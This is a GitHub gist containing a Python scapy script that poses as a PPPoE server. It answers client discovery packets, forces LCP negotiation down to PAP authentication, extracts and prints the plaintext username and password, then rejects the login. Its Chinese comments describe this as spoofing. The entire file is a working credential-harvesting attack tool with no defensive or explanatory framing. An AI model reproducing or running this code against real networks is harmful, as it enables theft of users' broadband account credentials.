Skip to content

Instantly share code, notes, and snippets.

@Admingyu
Created November 15, 2018 08:57
Show Gist options
  • Save Admingyu/7d7d4158023a9bb1ac9ebe39f04cfc6b to your computer and use it in GitHub Desktop.
Save Admingyu/7d7d4158023a9bb1ac9ebe39f04cfc6b to your computer and use it in GitHub Desktop.
# coding:utf-8
'''
@author Karblue
@date 2016年2月27日
'''
import struct
import uuid
import copy
import scapy.all as scapy
from scapy.layers.ppp import *
from psutil import net_if_addrs
MAC_ADDRESS = "0a:0a:0a:0a:0a:0a"
# 不适用于多网卡
def get_mac_address():
# mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
# return ":".join([mac[e:e + 2] for e in range(0, 11, 2)])
addrs = []
for k, v in net_if_addrs().items():
for item in v:
address = item[1]
if '-' in address and len(address) == 17:
addrs.append(address)
return addrs
class PPPoEServer(object):
def __init__(self):
self.clientMap = {}
# 开始监听
def start(self):
scapy.sniff(lfilter=self.filterData)
# 过滤pppoe数据
def filterData(self, raw):
if hasattr(raw, "type"):
_type2Method = {
# 发现阶段
0x8863: {
"code": {
# PADI
0x09: (self.send_pado_packet, "PADI阶段开始,发送PADO..."),
# PADR
0x19: (self.send_pads_packet, "PADR阶段开始,发送PADS...")
}
},
# 会话阶段
0x8864: {
"proto": {
# LCP链路处理
0xc021: (self.send_lcp_req, "欺骗成功,开始处理数据..."),
# PAP协议处理
0xc023: (self.get_papinfo, "获取账号信息...")
}
}
}
if raw.type in _type2Method:
_nMethod = _type2Method[raw.type]
for k, v in _nMethod.items():
_nVal = getattr(raw, k)
if _nVal in _nMethod[k]:
_nObj = _nMethod[k][_nVal]
print(_nObj[1])
_nObj[0](raw)
# 处理lcp-req请求
def send_lcp_req(self, raw):
if raw.load[0] == "\x01":
print("收到LCP-Config-Req")
# 第一次收到req 请求,直接拒绝
if raw.src not in self.clientMap:
self.send_lcp_reject_packet(raw)
# self.send_lcp_reject_packet(raw)
self.send_lcp_req_packet(raw)
self.clientMap[raw.src] = {"req": 1, "ack": 0}
# 无论何时收到req,返回原始ack
self.send_lcp_ack_packet(raw)
print("发送LCP-Config-Ack")
# 解析pap账号密码
def get_papinfo(self, raw):
# pap-req
if raw.load[0] == "\x01":
_payLoad = raw.load
_nUserLen = struct.unpack("!B", _payLoad[4])[0]
_nPassLen = struct.unpack("!B", _payLoad[5 + _nUserLen])[0]
_userName = _payLoad[5:5 + _nUserLen]
_passWord = _payLoad[6 + _nUserLen:6 + _nUserLen + _nPassLen]
print("get User:%s,Pass:%s" % (_userName, _passWord))
self.send_pap_authreject(raw)
if raw.src in self.clientMap:
del self.clientMap[raw.src]
print("欺骗完毕....")
# 发送pap拒绝验证
def send_pap_authreject(self, raw):
raw.dst, raw.src = raw.src, raw.dst
raw.load = "\x03\x02\x00\x06\x01\x00"
scapy.sendp(raw)
# 发送lcp-config-ack回执包
def send_lcp_ack_packet(self, raw):
raw = copy.deepcopy(raw)
raw.dst, raw.src = raw.src, raw.dst
raw.load = "\x02" + raw.load[1:]
scapy.sendp(raw)
# 发送lcp-config-reject回执包
def send_lcp_reject_packet(self, raw):
raw = copy.deepcopy(raw)
raw.dst, raw.src = raw.src, raw.dst
raw.load = "\x04" + raw.load[1:]
scapy.sendp(raw)
# 发送lcp-config-req回执包
def send_lcp_req_packet(self, raw):
# 实际client payload
raw = copy.deepcopy(raw)
raw.dst, raw.src = raw.src, raw.dst
_rawnLoad = raw.load
# 插入PAP认证
_payload = "\x01\x04\x05\xc8\x03\x04\xc0\x23\x05\x06\x5e\x63\x0a\xb8\x00\x00\x00\x00"
raw.load = "\x01\x01\x00" + chr(len(_payload)) + _payload
scapy.sendp(raw)
# 发送pa*系列包格式
def send_pa_packet(self, raw, **kwargs):
raw.src, raw.dst = MAC_ADDRESS, raw.src
# 寻找客户端的Host_Uniq
_host_Uniq = self.padi_find_hostuniq(raw.load)
_payload = "\x01\x01\x00\x00\x01\x02\x00\x03^_^"
if _host_Uniq:
_payload += _host_Uniq
raw.len = len(_payload)
raw.load = _payload
for k, v in kwargs.items():
setattr(raw, k, v)
scapy.sendp(raw)
# 发送lcp-termination会话终止包
def send_lcp_end_packet(self, raw):
_pkt = Ether(src=raw.dst, dst=raw.src, type=0x8863) / PPPoE(version=0x1, type=0x1, code=0xA7, sessionid=0x01,
len=0)
scapy.sendp(_pkt)
# 发送PADS回执包
def send_pads_packet(self, raw):
return self.send_pa_packet(raw, code=0x65, sessionid=0x01)
# 发送PADO回执包
def send_pado_packet(self, raw):
return self.send_pa_packet(raw, code=0x07)
# 寻找客户端发送的Host-Uniq
def padi_find_hostuniq(self, raw):
_key = "\x01\x03"
if _key in raw:
_nIdx = raw.index(_key)
# 2字节host-uniq 长度
_nLen = struct.unpack("!H", raw[_nIdx + 2:_nIdx + 4])[0]
# 2字节长度+剩余字节
_nData = raw[_nIdx + 2:_nIdx + 4 + _nLen]
return _key + _nData
return
if __name__ == "__main__":
print(get_mac_address())
macs = get_mac_address()
mac_dict = {}
i = 1
for mac in macs:
mac_dict[i] = mac
print('网卡%d, MAC: %s' % (i, mac))
i += 1
i = input('输入连接的有线网卡序号')
MAC_ADDRESS = mac_dict[int(i)]
print('获取到网卡:', MAC_ADDRESS)
print('等待pppoe客户端连接...')
n = PPPoEServer()
n.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment